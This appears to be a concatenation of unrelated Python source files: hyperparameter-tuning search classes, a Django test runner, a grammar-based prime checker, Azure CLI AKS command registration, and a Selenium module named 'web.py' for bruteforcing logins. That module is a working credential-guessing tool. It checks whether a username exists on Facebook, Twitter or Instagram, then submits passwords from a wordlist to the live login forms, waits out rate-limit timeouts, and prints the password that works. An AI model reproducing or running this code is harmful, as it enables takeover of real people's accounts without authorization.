objective_name: Optional[str] = None,
outcome_constraints: Optional[List[str]] = None,
multiprocessing: bool = False,
) -> None:
if parameters is None:
parameters = [{}]
# pyre-fixme[4]: Attribute must be annotated.
self.logger = logging.getLogger(__name__)
self.logger.info(
"Parameter tuning search space dimensions: {}".format(parameters)
)
self.validate_parameters_format(parameters)
# pyre-fixme[4]: Attribute must be annotated.
self.parameters = [InstantiationBase.parameter_from_json(parameter) for parameter in parameters]
self.outcome_constraints = (
[
InstantiationBase.outcome_constraint_from_str(str_constraint)
for str_constraint in outcome_constraints
]
if outcome_constraints is not None
else None
)
self._kats_search_space = SearchSpace(parameters=self.parameters)
self.logger.info("Search space is created.")
# pyre-fixme[4]: Attribute must be annotated.
self.job_id = uuid.uuid4()
# pyre-fixme[4]: Attribute must be annotated.
self.experiment_name = (
experiment_name if experiment_name else f"parameter_tuning_{self.job_id}"
)
# pyre-fixme[4]: Attribute must be annotated.
self.objective_name = (
objective_name if objective_name else f"objective_{self.job_id}"
)
self.multiprocessing = multiprocessing
self._exp = Experiment(
name=self.experiment_name,
search_space=self._kats_search_space,
runner=SyntheticRunner(),
)
self._trial_data = Data()
self.logger.info("Experiment is created.")
@staticmethod
# pyre-fixme[24]: Generic type `list` expects 1 type parameter, use
# `typing.List` to avoid runtime subscripting errors.
def validate_parameters_format(parameters: List) -> None:
"""Check parameters objects structure.
parameters object needs to be in a specific format. It needs to be
a list of dict where each dict associates a parameter. Raises an
error depending on the format violation.
Args:
parameters: parameters of which format is to be audited.
Returns:
None, if none of the checks fail, raises error if any fails.
Raises:
TypeError: If parameters is not of type list.
ValueError: Parameters cannot be empty as there should be at least
one hyperparameter to tune.
TypeError: If any of the list element is of type other then dict
"""
if not isinstance(parameters, list):
raise TypeError(
"The input parameter, parameters, should be a list even if a "
"single parameter is defined."
)
if len(parameters) == 0:
raise ValueError(
"The parameter list is empty. No search space can be created "
"if not parameter is specified."
)
for i, parameter_dict in enumerate(parameters):
if not isinstance(parameter_dict, dict):
raise TypeError(
"The parameter_dict, {i}, in the list of parameters should"
" be a dict. The parameter_dict is {parameter_dict}, and"
" its type is {type_}.".format(
i=i,
parameter_dict=str(parameter_dict),
type_=type(parameter_dict),
)
)
if len(parameter_dict) == 0:
raise ValueError(
"A parameter_dict in the parameter list is empty. All "
"parameter_dict items should have valid key: value entries"
"."
)
def get_search_space(self) -> SearchSpace:
"""Getter of search space attribute of the private attribute, _exp."""
return self._exp.search_space
def generator_run_for_search_method(
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
self, evaluation_function: Callable, generator_run: DiscreteModelBridge
) -> None:
"""Creates a new batch trial then runs the lastest.
Args:
evaluation_function: The name of the function to use for arm evaluation
generator_run: Generator_run object that is used to populate new arms
"""
self.evaluation_function = evaluation_function
outcome_constraints = self.outcome_constraints
if outcome_constraints:
# Convert dummy base Metrics to TimeseriesEvaluationMetrics
self.outcome_constraints = [
OutcomeConstraint(
TimeSeriesEvaluationMetric(
name=oc.metric.name,
evaluation_function=evaluation_function,
logger=self.logger,
multiprocessing=self.multiprocessing,
),
op=oc.op,
bound=oc.bound,
relative=oc.relative,
)
for oc in outcome_constraints
]
self._exp.optimization_config = OptimizationConfig(
objective=Objective(
metric=TimeSeriesEvaluationMetric(
name=self.objective_name,
evaluation_function=self.evaluation_function,
logger=self.logger,
multiprocessing=self.multiprocessing,
),
minimize=True,
),
outcome_constraints=self.outcome_constraints,
)
# pyre-fixme[6]: Expected `Optional[GeneratorRun]` for 1st param but got
# `DiscreteModelBridge`.
self._exp.new_batch_trial(generator_run=generator_run)
# We run the most recent batch trial as we only run candidate trials
self._exp.trials[max(self._exp.trials)].run()
self._trial_data = Data.from_multiple_data(
[
self._trial_data,
self._exp.fetch_trials_data(trial_indices=[max(self._exp.trials)]),
]
)
@abstractmethod
def generate_evaluate_new_parameter_values(
self,
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Callable,
arm_count: int = -1 # -1 means
# create all arms (i.e. all combinations of parameter values)
) -> None:
"""A place holder method for users that are still using it.
It previously ran evaluation for trials. That part was moved to
generator_run_for_search_methods(). Now this method does nothing.
"""
pass
@staticmethod
def _repivot_dataframe(armscore_df: pd.DataFrame) -> pd.DataFrame:
"""Reformats the score data frame.
Args:
armscore_df: Pandas DataFrame object that has the arm scores
in raw format.
Returns:
Pandas DataFrame object of arm score in the new format
"""
transform = (
armscore_df.set_index(["trial_index", "arm_name", "metric_name"])
.unstack("metric_name")
.reset_index()
)
new_cols = transform.columns.to_flat_index()
parameters_holder = transform[
list(filter(lambda x: "parameters" in x, new_cols))[0]
]
transform.drop(columns="parameters", level=0, inplace=True)
new_cols = new_cols.drop(labels=filter(lambda x: "parameters" in x, new_cols))
transform.columns = ["trial_index", "arm_name"] + [
"_".join(tpl) for tpl in new_cols[2:]
]
transform["parameters"] = parameters_holder
# pyre-fixme[7]: Expected `DataFrame` but got `Union[DataFrame, Series]`.
return transform
def list_parameter_value_scores(
self, legit_arms_only: bool = False
) -> pd.DataFrame:
"""Creates a Pandas DataFrame from evaluated arms then returns it.
The method should be called to fetch evaluation results of arms that
are populated and evaluated so far.
Args:
legit_arms_only: A flag to filter arms that violate output_constraints
if given any.
Returns:
A Pandas DataFrame that holds arms populated and evaluated so far.
"""
# For experiments which have not ran generate_evaluate_new_parameter_values,
# we cannot provide trial data without metrics, so we return empty dataframe
if not self._exp.metrics:
return pd.DataFrame(
[],
columns=[
"arm_name",
"metric_name",
"mean",
"sem",
"parameters",
"trial_index",
],
)
armscore_df = self._trial_data.df.copy()
armscore_df["parameters"] = armscore_df["arm_name"].map(
{k: v.parameters for k, v in self._exp.arms_by_name.items()}
)
if self.outcome_constraints:
# Deduplicate entries for which there are outcome constraints
armscore_df = armscore_df.loc[
# pyre-ignore[16]: `None` has no attribute `index`.
armscore_df.astype(str)
.drop_duplicates()
.index
]
if legit_arms_only:
def filter_violating_arms(
arms: List[Arm], data: Data, optimization_config: OptimizationConfig
) -> List[Arm]:
boolean_indices = []
for oc in optimization_config.outcome_constraints:
if oc.op is ComparisonOp.LEQ:
boolean_indices.append(
data.df[data.df.metric_name == oc.metric.name]["mean"]
<= oc.bound
)
else:
boolean_indices.append(
data.df[data.df.metric_name == oc.metric.name]["mean"]
>= oc.bound
)
eligible_arm_indices = reduce(lambda x, y: x & y, boolean_indices)
eligible_arm_names = data.df.loc[eligible_arm_indices.index][
eligible_arm_indices
].arm_name
return list(
filter(lambda x: x.name in eligible_arm_names.values, arms)
)
filtered_arms = filter_violating_arms(
list(self._exp.arms_by_name.values()),
self._exp.fetch_data(),
# pyre-fixme[6]: Expected `OptimizationConfig` for 3rd param but
# got `Optional[ax.core.optimization_config.OptimizationConfig]`.
self._exp.optimization_config,
)
armscore_df = armscore_df[
armscore_df["arm_name"].isin([arm.name for arm in filtered_arms])
]
armscore_df = self._repivot_dataframe(armscore_df)
return armscore_df
class SearchMethodFactory(metaclass=Final):
"""Generates and returns search strategy object."""
def __init__(self) -> None:
raise TypeError(
"SearchMethodFactory is not allowed to be instantiated. Use "
"it as a static class."
)
@staticmethod
def create_search_method(
parameters: List[Dict[str, Any]],
selected_search_method: SearchMethodEnum = SearchMethodEnum.GRID_SEARCH,
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
outcome_constraints: Optional[List[str]] = None,
seed: Optional[int] = None,
bootstrap_size: int = 5,
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Optional[Callable] = None,
bootstrap_arms_for_bayes_opt: Optional[List[Dict[str, Any]]] = None,
multiprocessing: bool = False,
) -> TimeSeriesParameterTuning:
"""The static method of factory class that creates the search method
object. It does not require the class to be instantiated.
Args:
parameters: List[Dict] = None,
Defines parameters by their names, their types their optional
values for custom parameter search space.
selected_search_method: SearchMethodEnum = SearchMethodEnum.GRID_SEARCH
Defines search method to be used during parameter tuning. It has to
be an option from the enum, SearchMethodEnum.
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
outcome_constraints: List[str] = None
List of constraints defined as strings. Example: ['metric1 >= 0',
'metric2 < 5]
bootstrap_arms_for_bayes_opt: List[dict] = None
List of params. It provides a list of self-defined inital parameter
values for Baysian Optimal search. Example: for Holt Winter's model,
[{'m': 7}, {'m': 14}]
Returns:
A search object, GridSearch, RandomSearch, or BayesianOptSearch,
depending on the selection.
Raises:
NotImplementedError: Raised if the selection is not among strategies
that are implemented.
"""
if selected_search_method == SearchMethodEnum.GRID_SEARCH:
return GridSearch(
parameters=parameters,
experiment_name=experiment_name,
objective_name=objective_name,
outcome_constraints=outcome_constraints,
multiprocessing=multiprocessing,
)
elif (
selected_search_method == SearchMethodEnum.RANDOM_SEARCH_UNIFORM
or selected_search_method == SearchMethodEnum.RANDOM_SEARCH_SOBOL
):
return RandomSearch(
parameters=parameters,
experiment_name=experiment_name,
objective_name=objective_name,
random_strategy=selected_search_method,
outcome_constraints=outcome_constraints,
seed=seed,
multiprocessing=multiprocessing,
)
elif selected_search_method == SearchMethodEnum.BAYES_OPT:
assert (
evaluation_function is not None
), "evaluation_function cannot be None. It is needed at initialization of BayesianOptSearch object."
return BayesianOptSearch(
parameters=parameters,
evaluation_function=evaluation_function,
experiment_name=experiment_name,
objective_name=objective_name,
bootstrap_size=bootstrap_size,
seed=seed,
bootstrap_arms_for_bayes_opt=bootstrap_arms_for_bayes_opt,
outcome_constraints=outcome_constraints,
multiprocessing=multiprocessing,
)
else:
raise NotImplementedError(
"A search method yet to implement is selected. Only grid"
" search and random search are implemented."
)
class GridSearch(TimeSeriesParameterTuning):
"""The method factory class that creates the search method object. It does
not require the class to be instantiated.
Do not instantiate this class using its constructor.
Rather use the factory, SearchMethodFactory.
Attributes:
parameters: List[Dict] = None,
Defines parameters by their names, their types their optional
values for custom parameter search space.
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
outcome_constraints: List[str] = None
List of constraints defined as strings. Example: ['metric1 >= 0',
'metric2 < 5]
"""
def __init__(
self,
parameters: List[Dict[str, Any]],
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
outcome_constraints: Optional[List[str]] = None,
multiprocessing: bool = False,
# pyre-fixme[2]: Parameter must be annotated.
**kwargs,
) -> None:
super().__init__(
parameters,
experiment_name,
objective_name,
outcome_constraints,
multiprocessing,
)
# pyre-fixme[4]: Attribute must be annotated.
self._factorial = Models.FACTORIAL(
search_space=self.get_search_space(), check_cardinality=False
)
self.logger.info("A factorial model for arm generation is created.")
self.logger.info("A GridSearch object is successfully created.")
def generate_evaluate_new_parameter_values(
self,
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Callable,
arm_count: int = -1, # -1 means create all arms (i.e. all combinations of
# parameter values)
) -> None:
"""This method can only be called once. arm_count other than -1 will be ignored
as this search strategy exhaustively explores all arms.
"""
if arm_count != -1:
# FullFactorialGenerator ignores specified arm_count as it automatically determines how many arms
self.logger.info(
"GridSearch arm_count input is ignored and automatically determined by generator."
)
arm_count = -1
factorial_run = self._factorial.gen(n=arm_count)
self.generator_run_for_search_method(
evaluation_function=evaluation_function, generator_run=factorial_run
)
class RandomSearch(TimeSeriesParameterTuning):
"""Random search for hyperparameter tuning.
Do not instantiate this class using its constructor.
Rather use the factory, SearchMethodFactory.
Attributes:
parameters: List[Dict],
Defines parameters by their names, their types their optional
values for custom parameter search space.
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
seed: int = None,
Seed for Ax quasi-random model. If None, then time.time() is set.
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
By now, we already know that the search method is random search.
However, there are optional random strategies: UNIFORM, or SOBOL.
This parameter allows to select it.
outcome_constraints: List[str] = None
List of constraints defined as strings. Example: ['metric1 >= 0',
'metric2 < 5]
"""
def __init__(
self,
parameters: List[Dict[str, Any]],
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
seed: Optional[int] = None,
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
outcome_constraints: Optional[List[str]] = None,
multiprocessing: bool = False,
# pyre-fixme[2]: Parameter must be annotated.
**kwargs,
) -> None:
super().__init__(
parameters,
experiment_name,
objective_name,
outcome_constraints,
multiprocessing,
)
if seed is None:
seed = int(time.time())
self.logger.info(
"No seed is given by the user, it will be set by the current time"
)
self.logger.info("Seed that is used in random search: {seed}".format(seed=seed))
if random_strategy == SearchMethodEnum.RANDOM_SEARCH_UNIFORM:
# pyre-fixme[4]: Attribute must be annotated.
self._random_strategy_model = Models.UNIFORM(
search_space=self.get_search_space(), deduplicate=True, seed=seed
)
elif random_strategy == SearchMethodEnum.RANDOM_SEARCH_SOBOL:
self._random_strategy_model = Models.SOBOL(
search_space=self.get_search_space(), deduplicate=True, seed=seed
)
else:
raise NotImplementedError(
"Invalid random strategy selection. It should be either "
"uniform or sobol."
)
self.logger.info(
"A {random_strategy} model for candidate parameter value generation"
" is created.".format(random_strategy=random_strategy)
)
self.logger.info("A RandomSearch object is successfully created.")
def generate_evaluate_new_parameter_values(
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
self, evaluation_function: Callable, arm_count: int = 1
) -> None:
"""This method can be called as many times as desired with arm_count in
desired number. The total number of generated candidates will be equal
to the their multiplication. Suppose we would like to sample k
candidates where k = m x n such that k, m, n are integers. We can call
this function once with `arm_count=k`, or call it k time with
`arm_count=1` (or without that parameter at all), or call it n times
`arm_count=m` and vice versa. They all will yield k candidates, however
it is not guaranteed that the candidates will be identical across these
scenarios.
"""
model_run = self._random_strategy_model.gen(n=arm_count)
self.generator_run_for_search_method(
evaluation_function=evaluation_function, generator_run=model_run
)
class BayesianOptSearch(TimeSeriesParameterTuning):
"""Bayesian optimization search for hyperparameter tuning.
Do not instantiate this class using its constructor.
Rather use the factory, SearchMethodFactory.
Attributes:
parameters: List[Dict],
Defines parameters by their names, their types their optional
values for custom parameter search space.
evaluation_function: Callable
The evaluation function to pass to Ax to evaluate arms.
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
bootstrap_size: int = 5,
The number of arms that will be randomly generated to bootstrap the
Bayesian optimization.
seed: int = None,
Seed for Ax quasi-random model. If None, then time.time() is set.
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
By now, we already know that the search method is random search.
However, there are optional random strategies: UNIFORM, or SOBOL.
This parameter allows to select it.
outcome_constraints: List[str] = None
List of constraints defined as strings. Example: ['metric1 >= 0',
'metric2 < 5]
"""
# pyre-fixme[11]: Annotation `BOTORCH` is not defined as a type.
_bayes_opt_model: Optional[Models.BOTORCH] = None
def __init__(
self,
parameters: List[Dict[str, Any]],
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Callable,
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
bootstrap_size: int = 5,
seed: Optional[int] = None,
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
outcome_constraints: Optional[List[str]] = None,
multiprocessing: bool = False,
# pyre-fixme[2]: Parameter must be annotated.
**kwargs,
) -> None:
super().__init__(
parameters,
experiment_name,
objective_name,
outcome_constraints,
multiprocessing,
)
if seed is None:
seed = int(time.time())
self.logger.info(
"No seed is given by the user, it will be set by the current time"
)
self.logger.info("Seed that is used in random search: {seed}".format(seed=seed))
if random_strategy == SearchMethodEnum.RANDOM_SEARCH_UNIFORM:
# pyre-fixme[4]: Attribute must be annotated.
self._random_strategy_model = Models.UNIFORM(
search_space=self.get_search_space(), deduplicate=True, seed=seed
)
elif random_strategy == SearchMethodEnum.RANDOM_SEARCH_SOBOL:
self._random_strategy_model = Models.SOBOL(
search_space=self.get_search_space(), deduplicate=True, seed=seed
)
else:
raise NotImplementedError(
"Invalid random strategy selection. It should be either "
"uniform or sobol."
)
self.logger.info(
"A {random_strategy} model for candidate parameter value generation"
" is created.".format(random_strategy=random_strategy)
)
bootstrap_arms_for_bayes_opt = kwargs.get("bootstrap_arms_for_bayes_opt", None)
if bootstrap_arms_for_bayes_opt is None:
model_run = self._random_strategy_model.gen(n=bootstrap_size)
else:
bootstrap_arms_list = [
Arm(name="0_" + str(i), parameters=params)
for i, params in enumerate(bootstrap_arms_for_bayes_opt)
]
model_run = GeneratorRun(bootstrap_arms_list)
self.generator_run_for_search_method(
evaluation_function=evaluation_function, generator_run=model_run
)
self.logger.info(f'fitted data columns: {self._trial_data.df["metric_name"]}')
self.logger.info(f"Bootstrapping of size = {bootstrap_size} is done.")
def generate_evaluate_new_parameter_values(
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
self, evaluation_function: Callable, arm_count: int = 1
) -> None:
"""This method can be called as many times as desired with arm_count in
desired number. The total number of generated candidates will be equal
to the their multiplication. Suppose we would like to sample k
candidates where k = m x n such that k, m, n are integers. We can call
this function once with `arm_count=k`, or call it k time with
`arm_count=1` (or without that parameter at all), or call it n times
`arm_count=m` and vice versa. They all will yield k candidates, however
it is not guaranteed that the candidates will be identical across these
scenarios. We re-initiate BOTORCH model on each call.
"""
self._bayes_opt_model = Models.BOTORCH(
experiment=self._exp,
data=self._trial_data,
)
model_run = self._bayes_opt_model.gen(n=arm_count)
self.generator_run_for_search_method(
evaluation_function=evaluation_function,
# pyre-fixme[6]: Expected `DiscreteModelBridge` for 2nd param but got
# `GeneratorRun`.
generator_run=model_run,
)
class SearchForMultipleSpaces:
def __init__(
self,
parameters: Dict[str, List[Dict[str, Any]]],
search_method: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
seed: Optional[int] = None,
) -> None:
"""Search class that runs search for multiple search spaces.
Created and used for ensemble models, or model selection.
Attributes:
parameters: Dict[str, List[Dict]],
Defines a search space per model. It maps model names to search spaces
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
seed: int = None,
Seed for Ax quasi-random model. If None, then time.time() is set.
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
By now, we already know that the search method is random search.
However, there are optional random strategies: UNIFORM, or SOBOL.
This parameter allows to select it.
"""
# search_agent_dict is a dict for str -> TimeSeriesParameterTuning object
# Thus, we can access different search method objects created using their
# keys.
# pyre-fixme[4]: Attribute must be annotated.
self.search_agent_dict = {
agent_name: SearchMethodFactory.create_search_method(
parameters=model_params,
selected_search_method=search_method,
experiment_name=experiment_name,
objective_name=objective_name,
seed=seed,
)
for agent_name, model_params in parameters.items()
}
def generate_evaluate_new_parameter_values(
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
self, selected_model: str, evaluation_function: Callable, arm_count: int = 1
) -> None:
"""Calls generate_evaluate_new_parameter_values() for the search method in
the search methods collection, search_agent_dict, called by selection_model
name.
Args:
selected_model: The name of the model that is being tuned for.
evaluation_function: The evaluation function to be used to evaluate
arms.
arm_count: Number of arms to be popuelated and evaluated.
"""
self.search_agent_dict[selected_model].generate_evaluate_new_parameter_values(
evaluation_function=evaluation_function, arm_count=arm_count
)
def list_parameter_value_scores(
self, selected_model: Optional[str] = None
) -> Union[pd.DataFrame, Dict[str, pd.DataFrame]]:
"""Calls list_parameter_value_scores() for the model that the name is given
or calls for every model otherwise.
Args:
select_model: The name of the model of which the agent's
list_parameter_value_scores() will be called, if given. If None,
then the same method is called for all model.
Returns:
A dictionary in which keys are model names, values are associated score
data frames.
"""
if selected_model:
return self.search_agent_dict[selected_model].list_parameter_value_scores()
else: # selected_model is not provided, therefore this method will
# return a dict of data frames where each key points to the
# parameter score values of the corresponding models.
return {
selected_model_: self.search_agent_dict[
selected_model_
].list_parameter_value_scores()
for selected_model_ in self.search_agent_dict
}
|
py
|
1a5f12fad059346bb382e2c323d37e66996bfb54
|
# -*- coding: utf-8 -*-
'''
web.py - Core module for web-based services bruteforce.
Category: Core
Description:
This module provides the methods for bruteforcing web-based services.
Most of these are built upon the Selenium library for webscraping and manipulation.
These include:
- facebook
- instagram
- twitter
Dependencies: main > selenium
Version: v1.0.0
Author: ex0dus
License: GPL-3.0 || https://opensource.org/licenses/GPL-3.0
'''
from src.main import *
# Assert: If specified string is NOT found, that means that user has succcessfully logged in.
# The specified string usually means that the search query is erroneous, meaning that no
# page for the specified user exists.
class WebBruteforce(object):
def __init__(self, service, username, wordlist, delay):
self.service = service
self.username = username
self.wordlist = wordlist
self.delay = delay
print P + "[*] Checking if username exists..." + W
self.usercheck(self.username, self.service)
if self.usercheck(username, service) == 1:
print R + "[!] The username was not found! Exiting..." + W
exit()
print G + "[*] Username found! Continuing..." + W
sleep(1)
self.webBruteforce(username, wordlist, service, delay)
def usercheck(self, username, service):
driver = webdriver.Firefox()
try:
if service == "facebook":
driver.get("https://www.facebook.com/" + username)
assert (("Sorry, this page isn't available.") not in driver.page_source)
driver.close()
elif service == "twitter":
driver.get("https://www.twitter.com/" + username)
assert (("Sorry, that page doesn’t exist!") not in driver.page_source)
driver.close()
elif service == "instagram":
driver.get("https://instagram.com/" + username)
assert (("Sorry, this page isn't available.") not in driver.page_source)
driver.close()
except AssertionError:
return 1
def webBruteforce(self, username, wordlist, service, delay):
driver = webdriver.Firefox()
if service == "facebook":
driver.get("https://touch.facebook.com/login?soft=auth/")
elif service == "twitter":
driver.get("https://mobile.twitter.com/session/new")
sleep(delay * 2)
elif service == "instagram":
driver.get("https://www.instagram.com/accounts/login/?force_classic_login")
wordlist = open(wordlist, 'r')
for i in wordlist.readlines():
password = i.strip("\n")
try:
# Find username element dependent on service
if service == "facebook":
elem = driver.find_element_by_name("email")
elif service == "twitter":
elem = driver.find_element_by_name("session[username_or_email]")
elif service == "instagram":
elem = driver.find_element_by_name("username")
elem.clear()
elem.send_keys(username)
# Find password element dependent on service
if service == "facebook":
elem = driver.find_element_by_name("pass")
elif service == "twitter":
elem = driver.find_element_by_name("session[password]")
elif service == "instagram":
elem = driver.find_element_by_name("password")
elem.clear()
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
sleep(delay) # need to wait for page to load, sleep for delay seconds.
# Check for changes in driver.title
if service == "facebook":
assert (("Log into Facebook | Facebook") in driver.title)
elif service == "twitter":
assert (("Twitter") in driver.title)
elif service == "instagram":
assert (("Log in — Instagram") in driver.title)
if TIMEOUT in driver.page_source:
print O + "[!] Timeout raised! Waiting... [!]" + W
sleep(300)
print O + "[*] Username: %s | [*] Password: %s | Incorrect!\n" % (username, password) + W
sleep(delay)
except AssertionError:
# AssertionError: successful login, since we do not see the string in the title, meaning
# that the page has changed.
print G + "[*] Username: %s | [*] Password found: %s\n" % (username, password) + W
exit(0)
except Exception as e:
print R + ("Error caught! %s" % e) + W
exit(1)
|
py
|
1a5f1392439b6f975054b0c02b6e8af64ded29c3
|
# coding: utf-8
import os
import sys
import django
from django.conf import settings
from django.test.utils import get_runner
def setup_and_run_tests(test_labels=None):
"""Discover and run project tests. Returns number of failures."""
test_labels = test_labels or ['fack.tests']
# noinspection PyStringFormat
os.environ['DJANGO_SETTINGS_MODULE'] = 'example.settings'
django.setup()
TestRunner = get_runner(settings)
test_runner = TestRunner(verbosity=1)
return test_runner.run_tests(test_labels)
def runtests(test_labels=None):
"""Run project tests and exit"""
# Used as setup test_suite: must either exit or return a TestSuite
failures = setup_and_run_tests(test_labels)
sys.exit(bool(failures))
if __name__ == '__main__':
runtests(test_labels=sys.argv[1:])
|
py
|
1a5f150022a7118544d45fcd2344076f51eb8a6b
|
import argparse
from collections import deque
def word_generator(productions, init_symbol_1, init_symbol_2, input_symbol, counter):
q = deque([init_symbol_1])
st = set()
productions_list = list()
result_productions_dict = dict()
result_rules_dict = dict()
while len(q):
word = q.popleft()
if word not in st:
st.add(word)
if all(c == input_symbol for c in word):
if counter == len(word):
prime_number_word = word
result_productions_dict[prime_number_word] = ''
result_rules_dict[prime_number_word] = 'Word was applied'
productions_list.reverse()
for lp, rp, left, right in productions_list:
if rp in result_productions_dict.keys():
result_productions_dict[lp] = rp
result_rules_dict[lp] = left + ' -> ' + right
result_file = open('./prime_checker_result.txt', 'w')
for key, value in result_productions_dict.items().__reversed__():
result_file.write('Applied rule: ' + result_rules_dict[key] + '\nResult replacement: ' + key + ' -> ' + value + '\n\n')
result_file.close()
else:
result_file = open('./prime_checker_result.txt', 'w')
result_file.write(f'{counter} is not a prime number')
result_file.close()
yield word
else:
for left, right in productions:
if left in word:
new_word = word.replace(left, right)
productions_list.append((word, new_word, left, right))
if any(S in new_word for S in [init_symbol_1, init_symbol_2]):
q.append(new_word)
else:
q.appendleft(new_word)
def read_free_grammar(path):
grammar = open(path)
str_productions = [line.strip('\n') for line in grammar.readlines()]
productions = []
for line in str_productions:
line = line.split(' -> ')
productions += [tuple(line)] if len(line) > 1 else [(line[0], '')]
grammar.close()
return productions
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-g", "--grammar_path", help="Path to file with grammar",
type=str, default="./free_prime_grammar.txt")
parser.add_argument("-n", help="Number to check", type=int)
args = parser.parse_args()
productions = read_free_grammar(args.grammar_path)
gen = word_generator(productions, 'First', 'Second', 'I', args.n)
is_end = False
is_prime = False
while not is_end:
next_word = gen.__next__()
is_end = len(next_word) >= args.n
is_prime = len(next_word) == args.n
if is_prime:
print(f'{args.n} is a prime number')
else:
print(f'{args.n} is not a prime number')
if __name__ == '__main__':
main()
|
py
|
1a5f1538cb5da133f5595b8c91204c8e726a75b3
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=no-name-in-module,import-error
from azure.cli.core.commands import CliCommandType
from azure.cli.core.commands.arm import deployment_validate_table_format
from ._client_factory import cf_container_services
from ._client_factory import cf_managed_clusters
from ._client_factory import cf_agent_pools
from ._client_factory import cf_openshift_managed_clusters
from ._format import aks_list_table_format
from ._format import aks_show_table_format
from ._format import aks_agentpool_show_table_format
from ._format import aks_agentpool_list_table_format
from ._format import osa_list_table_format
from ._format import aks_upgrades_table_format
from ._format import aks_versions_table_format
# pylint: disable=too-many-statements
def load_command_table(self, _):
container_services_sdk = CliCommandType(
operations_tmpl='azure.mgmt.containerservice.v2017_07_01.operations.'
'_container_services_operations#ContainerServicesOperations.{}',
client_factory=cf_container_services
)
managed_clusters_sdk = CliCommandType(
operations_tmpl='azure.mgmt.containerservice.v2020_09_01.operations.'
'_managed_clusters_operations#ManagedClustersOperations.{}',
client_factory=cf_managed_clusters
)
agent_pools_sdk = CliCommandType(
operations_tmpl='azext_aks_preview.vendored_sdks.azure_mgmt_preview_aks.'
'operations._agent_pools_operations#AgentPoolsOperations.{}',
client_factory=cf_managed_clusters
)
openshift_managed_clusters_sdk = CliCommandType(
operations_tmpl='azure.mgmt.containerservice.v2018_09_30_preview.operations.'
'_open_shift_managed_clusters_operations#OpenShiftManagedClustersOperations.{}',
client_factory=cf_openshift_managed_clusters
)
# ACS base commands
# TODO: When the first azure-cli release after January 31, 2020 is planned, add
# `expiration=<CLI core version>` to the `self.deprecate()` args below.
deprecate_info = self.deprecate(redirect='aks', hide=True)
with self.command_group('acs', container_services_sdk, deprecate_info=deprecate_info,
client_factory=cf_container_services) as g:
g.custom_command('browse', 'acs_browse')
g.custom_command('create', 'acs_create', supports_no_wait=True,
table_transformer=deployment_validate_table_format)
g.command('delete', 'delete', confirmation=True)
g.custom_command('list', 'list_container_services')
g.custom_command('list-locations', 'list_acs_locations')
g.custom_command('scale', 'update_acs')
g.show_command('show', 'get')
g.wait_command('wait')
# ACS Mesos DC/OS commands
with self.command_group('acs dcos', container_services_sdk, client_factory=cf_container_services) as g:
g.custom_command('browse', 'dcos_browse')
g.custom_command('install-cli', 'dcos_install_cli', client_factory=None)
# ACS Kubernetes commands
with self.command_group('acs kubernetes', container_services_sdk, client_factory=cf_container_services) as g:
g.custom_command('browse', 'k8s_browse')
g.custom_command('get-credentials', 'k8s_get_credentials')
g.custom_command('install-cli', 'k8s_install_cli', client_factory=None)
# AKS commands
with self.command_group('aks', managed_clusters_sdk, client_factory=cf_managed_clusters) as g:
g.custom_command('browse', 'aks_browse')
g.custom_command('create', 'aks_create', supports_no_wait=True)
g.custom_command('update', 'aks_update', supports_no_wait=True)
g.command('delete', 'delete', supports_no_wait=True, confirmation=True)
g.custom_command('update-credentials', 'aks_update_credentials', supports_no_wait=True)
g.custom_command('disable-addons', 'aks_disable_addons', supports_no_wait=True)
g.custom_command('enable-addons', 'aks_enable_addons', supports_no_wait=True)
g.custom_command('get-credentials', 'aks_get_credentials')
g.custom_command('check-acr', 'aks_check_acr')
g.command('get-upgrades', 'get_upgrade_profile', table_transformer=aks_upgrades_table_format)
g.custom_command('install-cli', 'k8s_install_cli', client_factory=None)
g.custom_command('list', 'aks_list', table_transformer=aks_list_table_format)
g.custom_command('remove-dev-spaces', 'aks_remove_dev_spaces', deprecate_info=g.deprecate())
g.custom_command('scale', 'aks_scale', supports_no_wait=True)
g.custom_show_command('show', 'aks_show', table_transformer=aks_show_table_format)
g.custom_command('upgrade', 'aks_upgrade', supports_no_wait=True)
g.custom_command('use-dev-spaces', 'aks_use_dev_spaces', deprecate_info=g.deprecate())
g.custom_command('rotate-certs', 'aks_rotate_certs', supports_no_wait=True,
confirmation='Kubernetes will be unavailable during certificate rotation process.\n' +
'Are you sure you want to perform this operation?')
g.wait_command('wait')
